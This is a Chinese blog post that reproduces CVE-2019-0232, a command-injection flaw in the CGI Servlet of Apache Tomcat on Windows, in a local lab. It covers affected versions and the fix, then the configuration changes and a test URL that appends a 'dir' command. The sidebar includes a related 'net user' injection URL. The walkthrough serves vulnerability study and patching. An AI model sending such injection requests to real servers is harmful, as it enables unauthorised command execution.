CVE-2019-0232:RCE on Windows Tomcat

最新推荐文章于 2023-03-06 17:42:00 发布
最新推荐文章于 2023-03-06 17:42:00 发布
阅读量784 收藏 1
点赞数 2
分类专栏: Web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/caiqiiqi/article/details/89841812
版权

漏洞描述

enableCmdLineArguments变量默认为true。
影响版本:

* Tomcat 9 – versions 9.0.0.M1 through 9.0.17 (9.0.18 is not affected)
* Tomcat 8 – versions 8.5.0 to 8.5.39
* Tomcat 7 – versions 7.0.0 to 7.0.93

修复方案:升级到7.0.94, 8.5.40 and 9.0.19
漏洞点:JRE将命令行参数传递给Windows的方式。与C的API:execve不同,Windows下创建进程时传递的参数是

利用条件

  • 运行在Windows
  • 通过web.xml开启了CGI支持(默认是不开启的)
  • 在conf\context.xml中添加privileged=“true”(默认是false)

缓解措施

如果不能升级,禁用掉CGI功能(其实本来就是禁用的,除非手动将其打开)

复现过程

1、在Windows下安装JRE
2、下载受影响版本的Tomcat
3、修改conf\context.xml文件(19行):

<Context privileged="true">

在这里插入图片描述
4、修改conf\web.xml,在365行左右

<servlet>
<servlet-name>cgi</servlet-name>
<servlet-class>org.apache.catalina.servlets.CGIServlet</servlet-class>
<init-param>
  <param-name>cgiPathPrefix</param-name>
  <param-value>WEB-INF/cgi</param-value>
</init-param>
<init-param>
  <param-name>executable</param-name>
  <param-value></param-value>
</init-param>
<init-param>
  <param-name>enableCmdLineArguments</param-name>
  <param-value>true</param-value>
</init-param>
<load-on-startup>5</load-on-startup>
</servlet>

5、启用CGI servlet。将注释取消掉,然后修改成这样:

<servlet-mapping>
<servlet-name>cgi</servlet-name>
<url-pattern>/cgi/*</url-pattern>
</servlet-mapping>

6、给CGI文件创建目录:

mkdir webapps\ROOT\WEB-INF\cgi

7、将以下文件内容放在webapps\ROOT\WEB-INF\cgi\test.bat

@echo off
echo Content-Type: text/plain
echo.
echo Hello, This is from CGI test_by_cqq!

8、命令行启动Tomcat:

cd bin
catalina run

访问:

http://localhost:8083/cgi/test.bat?&dir

在这里插入图片描述
其中enableCmdLineArguments只在Tomcat 9下需要(亲测Tomcat 8不需要)。
但是当执行系统命令的时候,发现并不能成功执行:
在这里插入图片描述
在这里插入图片描述
需要提供完整的路径名才能执行:
在这里插入图片描述
Tomcat有一个特别的Servlet叫做CGIServlet:https://github.com/apache/tomcat/blob/master/java/org/apache/catalina/servlets/CGIServlet.java
这个Servlet解析URL参数,然后将其转换成命令行参数。CGI脚本实际是通过 java.lang.Runtime的exec()方法来执行的。

PoC:https://github.com/pyn3rd/CVE-2019-0232
参考:https://blog.trendmicro.com/trendlabs-security-intelligence/uncovering-cve-2019-0232-a-remote-code-execution-vulnerability-in-apache-tomcat/
https://wwws.nightwatchcybersecurity.com/2019/04/30/remote-code-execution-rce-in-cgi-servlet-apache-tomcat-on-windows-cve-2019-0232/
https://seclists.org/fulldisclosure/2019/May/4

caiqiiqi
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
CVE-2019-0232(Apache Tomcat 远程代码执行)漏洞复现
weixin_45540609的博客
07-28 805
一、漏洞简介 2019年4月10日,Apache Tomcat披露了一个漏洞,漏洞编号为CVE-2019-0232,该漏洞存在于启用了enableCmdLineArguments选项的CGI Servlet中,与JRE向Windows传递参数过程中的bug有关。成功利用此漏洞可允许远程攻击者在目标服务器上执行任意命令,从而导致服务器被完全控制。由于Apache Tomcat应用范围广泛,该漏洞一旦被大规模利用,带来后果将不堪设想 影响版本: Apache Tomcat 9.0.0.M1 to 9.0.
CVE-2019-0232 Tomcat RCE 远程命令执行漏洞 复现环境
04-18
本附件是对CVE-2019-0232 Tomcat RCE 远程命令执行漏洞 的复现环境。 将文件下载到本地,直接运行tomcat 启动服务器,地址栏输入 http://localhost:8080/cgi-bin/hello.bat?c:/windows/system32/net user 即可看到漏洞效果,请勿非法使用,仅供学习研究
CVE-2019-0232
龙卷风摧毁停车场
03-06 207
该漏洞存在于启用了 enableCmdLineArguments 选项的 CGI Servlet 中,与 JRE 向 Windows 传递参数过程中的 bug 有关。利用此漏洞可允许远程攻击者在目标服务器上执行任意命令,导致服务器被完全控制。
CVE-2019-0232(TOMCAT远程代码执行)漏洞复现
weixin_43806577的博客
08-27 2244
一、漏洞简介 2019年4月13号,Apache Tomcat 9.0.18版本公告中提到,本次更新修复了一个代号为CVE-2019-0232的漏洞。 该漏洞只对Windows平台有效,Apache Tomcat 9.0.0.M1到9.0.17,8.5.0到8.5.39和7.0.0到7.0.93中的CGI Servlet很容易受到远程执行代码的影响,攻击者向CGI Servlet发送一个精心设...
CVE-2019-0232漏洞复现
m0_62314360的博客
01-04 3721
漏洞背景介绍: 2019年4月13号,Apache Tomcat 9.0.18版本公告中提到,本次更新修复了一个代号为CVE-2019-0232的漏洞。该漏洞只对Windows平台有效,Apache Tomcat 9.0.0.M1到9.0.17,8.5.0到8.5.39和7.0.0到7.0.93中的CGI Servlet很容易受到远程执行代码的影响,攻击者向CGI Servlet发送一个精心设计的请求,可在具有Apache Tomcat权限的系统上注入和执行任意操作系统命令。漏洞成因是当将...
CVE-2019-11708:针对Windows 64位版本的Firefox的完整漏洞利用链(CVE-2019-11708和CVE-2019-9810)
02-04
这是针对Windows 64位Firefox的完整的浏览器入侵漏洞利用链(CVE-2019-11708和CVE-2019-9810)。 它使用CVE-2019-9810在内容流程以及父流程中获取代码执行,并使用CVE-2019-11708诱骗父流程浏览到任意URL。 在过去...
cve-2019-1003000-jenkins-rce-poc:Jenkins RCE概念证明:SECURITY-1266 CVE-2019-1003000(脚本安全),CVE-2019-1003001(管道:Groovy),CVE-2019-1003002(管道:声明式)
02-05
PoC:Jenkins RCE SECURITY-1266 / CVE-2019-... 更新: 的文章解释了利用CVE-2018-1000861和CVE-2019-1003000的漏洞利用链,绕过了对预身份验证RCE的总体/读取权限的需求: : 安装 $ git clone https://github.co
CVE-2019-12814:CVE-2019-12814
05-26
**CVE-2019-12814:Jackson数据绑定库的远程代码执行漏洞** CVE-2019-12814是一个针对Java Jackson数据绑定库的重大安全漏洞,该漏洞允许攻击者通过恶意构造的JSON输入在解析过程中执行任意代码,从而可能导致系统...
CVE-2019-8449:针对Jira v2.1的CVE-2019-8449漏洞-v8.3.4
03-08
CVE-2019-8449 低于v8.3.4的Jira版本的CVE-2019-8449 Exploit CVSS得分: 5.0 漏洞类型:信息泄露身份验证:不需要受影响的版本: 2.1-8.3.4 发布日期: 2019-09-11 漏洞数据库: : 描述版本8.4.0之前的Jira中的/ ...
sudo-cve-2019-18634:CVE-2019-18634的概念证明
03-21
**sudo CVE-2019-18634 概念证明** sudo(Superuser DO)是Linux和Unix系统中的一个命令行工具,允许普通用户以超级用户(root)或其他用户的身份执行命令,通常用于管理系统。这个概念证明是关于CVE-2019-18634...
Apache tomcat远程代码执行验证代码
04-16
Apache tomcat远程代码执行代码
CVE-2019-0232:Apache Tomcat RCE漏洞
systemino的博客
04-27 2944
Apache Tomcat是在Apache Software Foundation (ASF)支持下开发的开源Java Servlet容器,实现了多个Java EE规范,包括Java Servlet, JavaServer Pages (JSP), Java Expression Language (EL), WebSocket,提供一个Java代码运行的纯Java HTTP web服务器环境。 ...
Apache Tomcat CVE-2019-0232 远程代码执行漏洞
a1b2c3是弱口令
04-20 4896
漏洞简介2019年4月10日,Apache Tomcat报告了一个漏洞,报告中称在windows上运行的Apache Tomcat存在远程代码执行漏洞,漏洞编号为CVE-2019-0232。在Windows平台,远程攻击者向CGI Servlet发送一个精心设计的请求,在具有Apache Tomcat权限的系统上注入和执行任意操作系统命令。漏洞成因是当将参数从JRE传递到Windows环境时,由...
第一次复现漏洞 远程代码执行漏洞(CVE-2019-0232)
qq_31314583的博客
11-25 2643
写在前面 在公司呆了一段时间了,bug写了一小堆之后,我居然要开始接触漏洞的东西了,阿巴阿巴。还好这段时间老师带我,同事帮我,所幸没出什么错。然后今天第一次接触漏洞,漏洞是啥。名声在外,但是一直没实操过。于是今天。 纷争开始了... 参考博客: 参考博客一:这篇手把手教你复现 参考博客二:这篇是原理 复现要求环境: 这是一个Apache Tomcat 远程代码执行漏洞。 配置要求: ...
cve-2019-0232Apache Tomcat远程代码执行漏洞打开计算器
anlalu233的博客
03-27 1580
一、 漏洞简介 1.漏洞编号和级别 CVE编号:CVE-2019-0232,危险级别:高危,CVSS分值:官方未评定。 2.漏洞概述 Apache Tomcat是美国阿帕奇(Apache)软件基金会的一款轻量级Web应用服务器。该程序实现了对Servlet和JavaServer Page(JSP)的支持。 4月11日,Apache官方发布通告称将在最新版本中修复一个远程代码执行漏洞(CVE-201...
CVE-2019-0232 Apache Tomcat远程任意代码执行漏洞复现及复现过程中遇到的问题
weixin_45432023的博客
02-25 642
CVE编号:CVE-2019-0232 威胁等级:高危 漏洞背景 2019年4月13号,Apache Tomcat 9.0.18版本公告中提到,本次更新修复了一个代号为CVE-2019-0232的漏洞。 该漏洞只对Windows平台有效,攻击者向CGI Servlet发送一个精心设计的请求,可服务端注入和执行任意操作系统命令。 影响范围: Apache Tomcat 9.0.0.M1 to 9....
Apache Tomcat(CVE-2019-0232)远程代码执行漏洞复现
qq_17754023的博客
02-28 1961
0x00简介 Tomcat 服务器是一个免费的开放源代码的Web 应用服务器,属于轻量级应用服务器,在中小型系统和并发访问用户不是很多的场合下被普遍使用,是开发和调试JSP 程序的首选。对于一个初学者来说,可以这样认为,当在一台机器上配置好Apache 服务器,可利用它响应HTML(标准通用标记语言下的一个应用)页面的访问请求。实际上Tomcat是Apache 服务器的扩展,但运行时它是独立运行的,所以当你运行tomcat 时,它实际上作为一个与Apache 独立的进程单独运行的。 0x01漏洞概述
JAVA CGI 远程代码执行_ApacheTomca远程执行代码(CVE-2019-0232)漏洞浅析和复现
weixin_31236309的博客
03-04 317
ApacheTomca远程执行代码(CVE-2019-0232)漏洞浅析和复现一、 漏洞背景Apache Tomcat,俗称Tomcat Server,是一个开源的JavaServlet容器,由社区在Apache Software Foundation(ASF)的支持下开发。它实现了多个Java EE规范,包括Java Servlet,JavaServer Pages(JSP),Java表达式语言...
Jackson 最新反序列化漏洞(CVE-2019-14361和CVE-2019-144391
最新发布
07-14
你提到的 Jackson 最新反序列化漏洞是 CVE-2019-14361 和 CVE-2019-14439。这些漏洞都是与 Jackson 库中的反序列化功能相关的安全问题。 CVE-2019-14361 是一个远程代码执行漏洞,攻击者可以通过构造恶意的序列化...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值